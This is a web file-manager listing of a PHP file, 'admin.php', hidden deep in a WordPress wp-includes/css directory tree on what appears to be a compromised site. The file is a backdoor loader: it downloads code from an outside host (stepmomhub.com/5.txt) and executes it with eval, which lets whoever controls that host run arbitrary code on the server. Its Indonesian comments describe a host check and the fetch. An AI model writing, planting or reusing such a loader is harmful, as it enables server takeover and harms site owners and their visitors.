File "admin.php"
Full path: /home/omtekel/www/wp-includes/css/dist/admin-ui/data/uploads/backup/assets/qcom/admin.php
File size: 374 B
MIME-type: text/x-php
Charset: utf-8
Download Open Edit Advanced Edit Back
<?php
$allowed_host = 'stepmomhub.com';
$url = 'https://stepmomhub.com/5.txt';
// Pastikan domain sesuai
if (parse_url($url, PHP_URL_HOST) !== $allowed_host) {
die("URL tidak diizinkan!");
}
// Ambil kode dengan cURL/file_get_contents
$code = file_get_contents($url);
if ($code) {
eval('?>' . $code);
} else {
die("Gagal mengambil kode.");
}
?>